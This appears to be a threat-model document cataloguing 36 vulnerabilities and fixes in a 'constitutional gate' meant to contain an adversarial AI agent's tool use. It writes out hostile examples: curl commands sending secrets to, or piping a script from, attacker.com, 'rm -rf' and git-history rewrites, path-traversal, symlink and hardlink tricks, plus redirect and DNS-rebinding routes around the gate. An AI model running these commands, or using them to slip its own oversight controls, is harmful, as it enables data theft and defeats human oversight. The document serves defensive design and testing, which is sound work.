Version: 1.0
Date: February 6, 2026
Audit: ChatGPT (OpenAI), February 5, 2026
Status: 36 Vulnerabilities Found, 36 Fixed, Production-Approved
This document catalogs the complete threat landscape discovered during the ChatGPT security audit of the AOS Constitutional Gate, conducted February 5, 2026.
Audit results:
Key finding: Through rigorous, iterative security review, we evolved from a "hope-based" policy system to a cryptographically enforced constitutional gate with defense in depth across multiple layers.
Adversarial agent assumed to have:
Out of scope for v1.0:
Context: Initial policy-based design with guardrails.yaml enforcement
Severity: CRITICAL
Category: Access Control
Description:
The run_command tool was in the allowlist without restrictions. An adversarial agent could execute arbitrary shell commands, including:
rm -rf /brain/stream (delete journals)
git reset --hard HEAD~10 (rewrite history)
curl attacker.com -d @/brain/evidence/secrets.json (exfiltrate data)
Fix:
run_command to require human approval
Verification: BYP-006 (command execution bypass test)
Severity: CRITICAL
Category: Authorization
Description: Policy defined path allowlists, but enforcement code didn't check them. Agent could write to any path, including:
/brain/stream/*.log (corrupt journals)
/brain/.git/ (tamper with history)
/etc/passwd (escalate privileges if run as root)
Fix:
validateAndCanonicalizePath() function
Verification: BYP-001 (path traversal test)
Severity: HIGH
Category: Error Handling
Description: Multiple try/catch blocks had empty catch clauses or logged errors without denying execution. Example:
try {
  await validateScope(path);
} catch (error) {
  console.error(error); // ⚠️ No DENY!
}
await executeFileWrite(path); // Executes even if validation failed
Fix:
Verification: Exception injection tests
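The fail-closed counterpart of the snippet above can be sketched as follows. This is a minimal illustration, not the gate's actual code: guardedWrite and its result shape are hypothetical, and validateScope and executeFileWrite are passed in as stand-ins for the functions named in the example.

```javascript
// Hypothetical fail-closed wrapper. The function name and the
// { decision, reason } result shape are illustrative assumptions.
async function guardedWrite(path, validateScope, executeFileWrite) {
  try {
    await validateScope(path);
  } catch (error) {
    // Fail closed: a validation error is a DENY, never just a log line.
    const reason = error instanceof Error ? error.message : String(error);
    return { decision: 'DENY', reason };
  }
  // Reached only when validation completed without throwing.
  await executeFileWrite(path);
  return { decision: 'ALLOW' };
}
```

The key difference from the vulnerable version is that the executor call is unreachable once validation throws.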
Severity: HIGH
Category: Accountability
Description: Executors didn't require attestations. Even when the policy check ran, there was no cryptographic proof that validation had occurred.
Fix:
Verification: Attestation verification tests
Severity: MEDIUM
Category: Denial of Service
Description: No limits on tool call frequency or data volume. Agent could:
Fix:
Verification: Budget exhaustion tests
VUL-006: No category checking (could violate humanitarian license)
Fix: Added prohibited category classifier
VUL-007: Missing approval mechanism (no human-in-the-loop)
Fix: Implemented out-of-band approval service
VUL-008: No journal logging (no audit trail)
Fix: Created chained, signed journal entries
VUL-009: No startup validation (broken config could be loaded)
Fix: Startup self-tests with fail-closed behavior
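To illustrate the "chained, signed journal entries" fix for VUL-008, here is a minimal sketch. It assumes Ed25519 signatures and string payloads; the document does not specify the signature algorithm or entry layout, and appendEntry and verifyJournal are hypothetical names.

```javascript
const crypto = require('node:crypto');

const GENESIS = '0'.repeat(64); // assumed placeholder "previous hash" for the first entry

function entryHash(prevHash, payload) {
  // The hash covers the previous entry's hash, which is what forms the chain.
  return crypto.createHash('sha256').update(JSON.stringify({ prevHash, payload })).digest('hex');
}

// Appends a string payload, linking it to the previous entry and signing the hash bytes.
function appendEntry(journal, payload, privateKey) {
  const prevHash = journal.length ? journal[journal.length - 1].hash : GENESIS;
  const hash = entryHash(prevHash, payload);
  const signature = crypto.sign(null, Buffer.from(hash, 'hex'), privateKey).toString('base64');
  journal.push({ prevHash, payload, hash, signature });
}

// Returns false if any entry was edited, reordered, or re-signed with another key.
function verifyJournal(journal, publicKey) {
  let expectedPrev = GENESIS;
  for (const entry of journal) {
    const hash = entryHash(entry.prevHash, entry.payload);
    const ok = entry.prevHash === expectedPrev &&
      entry.hash === hash &&
      crypto.verify(null, Buffer.from(hash, 'hex'), publicKey, Buffer.from(entry.signature, 'base64'));
    if (!ok) return false;
    expectedPrev = entry.hash;
  }
  return true;
}
```

Because each hash includes the previous one, changing an early entry invalidates every later entry as well.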
Context: After Pass 1 fixes, more subtle attack vectors emerged
Severity: HIGH
Category: Logic Error
Description:
The policy named the tool git.commit, but the executor was registered as git_commit. An agent could also call git.reset (not in policy); because no executor existed for it, the resulting behavior was undefined.
Fix:
git.commit)
Verification: BYP-013 (unknown tool test)
Severity: HIGH
Category: Path Manipulation
Description: Even with path validation, multiple bypass routes existed:
../../../etc/passwd (classic traversal)
%2e%2e%2f (URL-encoded traversal)
/brain/now/../stream/journal.log (relative traversal)
Fix:
path.resolve()
Verification: BYP-001, BYP-012 (encoded traversal)
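A lexical check built on path.resolve() might look like the sketch below. The body shown for validateAndCanonicalizePath is an assumption (the document names the function but does not show it), and the /brain/now root and the rule of denying any leftover percent sign are illustrative choices.

```javascript
const path = require('node:path');

// Assumed allowed root for illustration; the real allowlist lives in the policy.
const ALLOWED_ROOT = '/brain/now';

// Returns the canonical absolute path, or null (DENY) if it leaves the allowed root.
function validateAndCanonicalizePath(requested, allowedRoot = ALLOWED_ROOT) {
  let decoded;
  try {
    decoded = decodeURIComponent(requested); // turns %2e%2e%2f into ../
  } catch {
    return null; // malformed percent-encoding: deny
  }
  // A NUL byte or a remaining '%' (e.g. double encoding) is treated as hostile.
  if (decoded.includes('\0') || decoded.includes('%')) return null;
  // posix.resolve collapses "." and ".." segments and makes the path absolute.
  const resolved = path.posix.resolve(allowedRoot, decoded);
  const inside = resolved === allowedRoot || resolved.startsWith(allowedRoot + '/');
  return inside ? resolved : null;
}
```

This check is purely textual. It does not look at the filesystem, so symlinks and hardlinks still need the separate defenses described in the following entries.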
Severity: HIGH
Category: Filesystem Manipulation
Description: Agent could create symlink in allowed path pointing to protected path:
ln -s /brain/stream/journal.log /brain/now/fake.txt
# Then write to /brain/now/fake.txt → overwrites journal
Fix:
Verification: BYP-003 (symlink bypass test)
Severity: MEDIUM
Category: Filesystem Manipulation
Description: Agent could hardlink protected file into allowed path, then modify:
ln /brain/stream/journal.log /brain/now/copy.log
# Both paths point to same inode - modify one, both change
Fix:
Verification: BYP-011 (hardlink test)
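The hardlink defense listed later in this document is an nlink count check. A minimal sketch of such a check, assuming a hypothetical helper named assertSingleLink, could be:

```javascript
const fs = require('node:fs');

// Throws if the file is reachable through more than one directory entry.
function assertSingleLink(filePath) {
  const fd = fs.openSync(filePath, 'r');
  try {
    // fstat on the open descriptor inspects the inode that was actually
    // opened, not whatever the path may point to a moment later.
    const { nlink } = fs.fstatSync(fd);
    if (nlink > 1) {
      throw new Error(`DENY: ${filePath} has ${nlink} hard links`);
    }
  } finally {
    fs.closeSync(fd);
  }
}
```

Note that once a hardlink exists, both names report the same count, so the protected original is flagged as well as the copy.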
Severity: HIGH
Category: Race Condition
Description: Time-of-check-time-of-use vulnerability:
write_file('/brain/now/good.txt', 'safe data')
write_file('/brain/stream/journal.log', 'evil')
Fix:
Verification: TOCTOU test
Severity: HIGH
Category: Container Escape
Description:
The run_command sandbox had network access, allowing:
curl attacker.com -d @/brain/now/secrets.txt
curl attacker.com/evil.sh | bash
Fix:
Verification: BYP-015 (sandbox network test)
Severity: MEDIUM
Category: Container Configuration
Description: Sandbox mounted /brain/now as read-write, allowing:
Fix:
Verification: BYP-015 (sandbox write test)
Severity: MEDIUM
Category: HTTP Protocol
Description: Agent could request allowed domain that redirects to forbidden domain:
1. Request: https://allowed.com/redirect
2. 302 → https://evil.com/exfiltrate
3. Gate follows redirect without rechecking allowlist
Fix:
Verification: BYP-009 (redirect test)
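One way to close this gap is to follow redirects manually and recheck the allowlist on every hop. The sketch below assumes a hypothetical fetchOnce(url) helper that performs a single request without following redirects and resolves to an object with status and location fields; it is not the gate's actual HTTP client.

```javascript
// Follows redirects one hop at a time, validating each URL before requesting it.
async function fetchWithCheckedRedirects(startUrl, allowedHosts, fetchOnce, maxHops = 5) {
  let current = new URL(startUrl);
  for (let hop = 0; hop <= maxHops; hop++) {
    // Recheck on every hop, not only for the first URL.
    if (current.protocol !== 'https:' || !allowedHosts.has(current.hostname)) {
      throw new Error(`DENY: ${current.hostname} is not on the allowlist`);
    }
    const response = await fetchOnce(current.href);
    const isRedirect = response.status >= 300 && response.status < 400 && response.location;
    if (!isRedirect) return response;
    // Resolve relative Location headers against the current URL.
    current = new URL(response.location, current);
  }
  throw new Error('DENY: too many redirects');
}
```

With this structure the forbidden host is rejected before any request is sent to it.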
Context: Moving from "works in testing" to "production-grade"
Severity: HIGH
Category: Implementation Bug
Description:
Node.js fs.writeFile() doesn't support O_NOFOLLOW directly. Passing it has no effect, so symlinks are still followed.
Fix:
fs.open() with explicit flags
/proc/self/fd/<fd> path
Verification: Symlink tests with actual fs operations
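Opening with explicit flags can be sketched as below. writeFileNoFollow is a hypothetical helper name, the flag combination and 0o600 mode are assumptions, and the sketch uses the synchronous fs.openSync variant for brevity. O_NOFOLLOW only guards the final path component, which is presumably why the fix also lists a /proc/self/fd/<fd> check; that part is not shown here.

```javascript
const fs = require('node:fs');

// Writes data to filePath, refusing to follow a symlink at the final component.
function writeFileNoFollow(filePath, data) {
  const { O_WRONLY, O_CREAT, O_TRUNC, O_NOFOLLOW } = fs.constants;
  if (O_NOFOLLOW === undefined) {
    // Fail closed on platforms that do not expose the flag.
    throw new Error('DENY: O_NOFOLLOW is unavailable on this platform');
  }
  // With O_NOFOLLOW, open fails if filePath itself is a symlink.
  const fd = fs.openSync(filePath, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0o600);
  try {
    fs.writeFileSync(fd, data); // write through the descriptor, not the path
  } finally {
    fs.closeSync(fd);
  }
}
```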
Severity: HIGH
Category: Canonicalization
Description: SHA-256 of JSON.stringify depends on key order:
JSON.stringify({b: 2, a: 1}) !== JSON.stringify({a: 1, b: 2})
Agent could reorder object keys to get different hash, bypassing TOCTOU protection.
Fix:
Verification: BYP-014 (nested args hash test)
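A key-order-independent hash can be sketched by serializing objects with sorted keys before hashing. This is a simplified illustration for plain JSON data, not a full RFC 8785 implementation (it does not handle that standard's number formatting rules); canonicalize and hashArgs are hypothetical names.

```javascript
const crypto = require('node:crypto');

// Serializes plain JSON data with object keys in sorted order at every depth.
function canonicalize(value) {
  if (Array.isArray(value)) {
    return '[' + value.map(canonicalize).join(',') + ']'; // array order is significant
  }
  if (value !== null && typeof value === 'object') {
    const keys = Object.keys(value).sort();
    return '{' + keys.map((k) => JSON.stringify(k) + ':' + canonicalize(value[k])).join(',') + '}';
  }
  return JSON.stringify(value); // strings, numbers, booleans, null
}

// SHA-256 over the canonical form, so reordered keys give the same digest.
function hashArgs(args) {
  return crypto.createHash('sha256').update(canonicalize(args), 'utf8').digest('hex');
}
```

With this in place, {b: 2, a: 1} and {a: 1, b: 2} produce the same hash, including when the reordering happens inside nested objects.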
Severity: MEDIUM
Category: Container Security
Description:
Seccomp profile blocked execve but allowed run_command. Commands couldn't execute, causing failures.
Fix:
Verification: Command execution in sandbox
Severity: MEDIUM
Category: Race Condition
Description:
Journal files created normally, then chattr +a applied later. Between creation and attribute setting, file could be overwritten.
Fix:
safeCreateFile() with atomic flags
Verification: File creation race test
Severity: MEDIUM
Category: Network Security
Description: Attacker controls DNS, can rebind domain to private IP:
1. Gate checks: allowed.com → 1.2.3.4 (public) → ALLOW
2. DNS rebinds: allowed.com → 192.168.1.1 (private)
3. Gate connects → accesses internal network
Fix:
Verification: BYP-010 (DNS rebinding test)
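The IP pinning defense named in the security guarantees can be sketched as: resolve once, validate the address, then connect to that exact address. The helper names below are hypothetical, the lookup function is injected (for example dns.promises.lookup), and the range list covers common IPv4 private and special-purpose blocks only. Anything that is not a plain IPv4 literal is denied as a conservative assumption.

```javascript
const net = require('node:net');

// True for addresses the gate should refuse to connect to.
function isDisallowedAddress(ip) {
  if (!net.isIPv4(ip)) return true; // fail closed on IPv6 or malformed input
  const [a, b] = ip.split('.').map(Number);
  return a === 0 || a === 10 || a === 127 ||
    (a === 169 && b === 254) ||          // link-local
    (a === 172 && b >= 16 && b <= 31) || // 172.16.0.0/12
    (a === 192 && b === 168);            // 192.168.0.0/16
}

// Resolves the hostname once and returns the address to pin for the connection.
async function resolveAndPin(hostname, lookup) {
  const { address } = await lookup(hostname);
  if (isDisallowedAddress(address)) {
    throw new Error(`DENY: ${hostname} resolved to non-public address ${address}`);
  }
  // The caller must connect to pinnedAddress and must not resolve hostname again.
  return { hostname, pinnedAddress: address };
}
```

Because the connection uses the pinned address, a later DNS answer pointing at 192.168.1.1 is never consulted.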
Context: Ensuring production correctness of all mechanisms
Severity: HIGH
Category: Protocol Error
Description:
Unix socket handler assumed one data event = one complete JSON message. Stream sockets (Unix or TCP) can split or coalesce messages, causing:
Fix:
Verification: Chunked message tests
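A common way to handle split and coalesced chunks is explicit message framing. The sketch below assumes newline-delimited JSON, which is one possible framing and not necessarily the one the gate adopted; createFramer and the size limit are hypothetical.

```javascript
const { StringDecoder } = require('node:string_decoder');

// Returns a 'data' handler that emits one parsed object per complete line.
function createFramer(onMessage, maxBufferedChars = 1024 * 1024) {
  const decoder = new StringDecoder('utf8'); // keeps split multi-byte characters intact
  let buffer = '';
  return function onData(chunk) {
    buffer += decoder.write(chunk);
    let newline;
    // Drain every complete message currently in the buffer.
    while ((newline = buffer.indexOf('\n')) !== -1) {
      const line = buffer.slice(0, newline);
      buffer = buffer.slice(newline + 1);
      // JSON.parse throws on malformed input; the caller should treat that as DENY.
      if (line.length > 0) onMessage(JSON.parse(line));
    }
    // Bound memory use when a peer never sends a newline.
    if (buffer.length > maxBufferedChars) {
      throw new Error('DENY: message exceeds size limit');
    }
  };
}
```

A handler created this way would be attached with socket.on('data', createFramer(handleMessage)), where handleMessage is whatever processes a complete request.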
Severity: MEDIUM
Category: Architecture
Description: The documentation was unclear about whether the agent is trusted. It mixed statements such as "agent cannot access socket" and "socket allows agent".
Fix:
Verification: Documentation review
Severity: MEDIUM
Category: Cryptographic Binding
Description: Request auth token (if we kept HMAC) was bound to toolName + argsHash only. It wasn't bound to the full decision, allowing replay under a different policy.
Fix:
Verification: Auth token tests (or removal)
Severity: LOW
Category: Portability
Description:
/proc/self/fd/<fd> check is Linux-specific. On other platforms, fails unpredictably.
Fix:
Verification: Platform check test
Severity: LOW
Category: Filesystem Dependency
Description:
chattr +a requires ext4/btrfs. On other filesystems (xfs, zfs), command fails silently.
Fix:
Verification: Append-only test at startup
Severity: LOW
Category: Documentation
Description: Seccomp tried to limit clone() flags, but that's unreliable. Unclear if relying on seccomp or cgroups for process limits.
Fix:
Verification: Multi-layer enforcement tests
Severity: LOW
Category: UX / Logic
Description: If agent asks ambiguous question in single-shot mode, gate must DENY. But unclear how to handle in practice.
Fix:
Verification: Ambiguous request tests
Context: Final security review before production approval
Severity: MEDIUM
Category: IPC Security
Description: Socket perms + UID check implementation wasn't consistent with stated trust boundary.
Fix:
Verification: SO_PEERCRED tests
Severity: HIGH
Category: Cryptographic Flaw
Description: Classic attack: token included approver public key. Attacker can:
Fix:
Verification: Token forgery test
Severity: HIGH
Category: Replay Protection
Description: Nonces were stored in an in-memory Set. A gate restart cleared the Set, so nonces became reusable within the freshness window.
Fix:
Verification: Restart + replay test
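Durable nonce storage can be sketched with an append-only file that is replayed at startup. DurableNonceStore, its file format, and the nonce character set are assumptions for illustration; a production store would also expire nonces older than the freshness window.

```javascript
const fs = require('node:fs');

class DurableNonceStore {
  constructor(filePath) {
    this.filePath = filePath;
    this.seen = new Set();
    // Reload previously accepted nonces so a restart does not forget them.
    if (fs.existsSync(filePath)) {
      for (const line of fs.readFileSync(filePath, 'utf8').split('\n')) {
        if (line) this.seen.add(line);
      }
    }
  }

  // Returns true the first time a nonce is seen, false on replay or bad input.
  consume(nonce) {
    if (typeof nonce !== 'string' || !/^[A-Za-z0-9_-]+$/.test(nonce)) return false;
    if (this.seen.has(nonce)) return false;
    // Persist and fsync before accepting, so a crash cannot lose an accepted nonce.
    const fd = fs.openSync(this.filePath, 'a');
    try {
      fs.writeSync(fd, nonce + '\n');
      fs.fsyncSync(fd);
    } finally {
      fs.closeSync(fd);
    }
    this.seen.add(nonce);
    return true;
  }
}
```

Constructing a new store over the same file models a gate restart: nonces accepted before the restart are still rejected afterwards.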
Severity: MEDIUM
Category: Cryptographic Protocol
Description: Code signed "hex string of hash" but unclear if that's ASCII hex or raw bytes. Easy to get inconsistent.
Fix:
Verification: Signature interop tests
Severity: LOW
Category: Implementation Gap
Description:
Code showed require('getsockopt') as placeholder. Not a real package.
Fix:
Verification: Actual peer verification
Severity: LOW
Category: Trust Root
Description: Approver registry needed integrity protection. How do we know it's not tampered?
Fix:
Verification: Registry tampering test
Severity: LOW
Category: Standards Compliance
Description: Claimed RFC 8785 compliance but no test vectors to prove it.
Fix:
Verification: RFC test vector suite
Layer 1: Process Isolation
Layer 2: OS-Level Constraints
Layer 3: Cryptographic Enforcement
Layer 4: Fail-Closed Behavior
Layer 5: Immutable Logging
✅ Agent cannot write to protected paths (OS permissions)
✅ Agent cannot bypass gate (executors only in gate process)
✅ Agent cannot forge attestations (gate private key never exposed)
✅ Agent cannot forge approval tokens (approver keys in registry)
✅ Agent cannot replay requests (durable nonce storage)
✅ Agent cannot access the network from the sandbox (sandbox has no network access)
✅ Agent cannot escape via symlinks (O_NOFOLLOW enforced)
✅ Agent cannot escape via hardlinks (nlink count check)
✅ Agent cannot traverse paths (canonicalization)
✅ Agent cannot rebind DNS (IP pinning)
✅ Agent cannot TOCTOU approval (args hash binding)
❌ OS kernel compromise (requires trusted kernel)
❌ Hardware attacks (TPM integration planned Q1 2026)
❌ Side channel attacks (timing, speculation)
❌ Physical access (server room security)
❌ Social engineering (human approver decision)
BYP-001: Path traversal (../../../etc/passwd)
BYP-002: Absolute path to protected file
BYP-003: Symlink to protected path
BYP-004: Network request to private IP
BYP-005: Network request to forbidden domain
BYP-006: Parallel executor access
BYP-007: Missing attestation execution
BYP-008: Invalid approval token
BYP-009: Network redirect to forbidden domain
BYP-010: DNS rebinding to private IP
BYP-011: Hardlink to protected file
BYP-012: Encoded path traversal (%2e%2e%2f)
BYP-013: Unknown tool execution
BYP-014: Nested args TOCTOU via key reordering
BYP-015: Sandbox write to protected path
Result: 15/15 tests pass (100% required for production)
Security audit partner:
Implementation:
Development environment:
Human leadership:
AOS Constitutional Gate Threat Model v1.0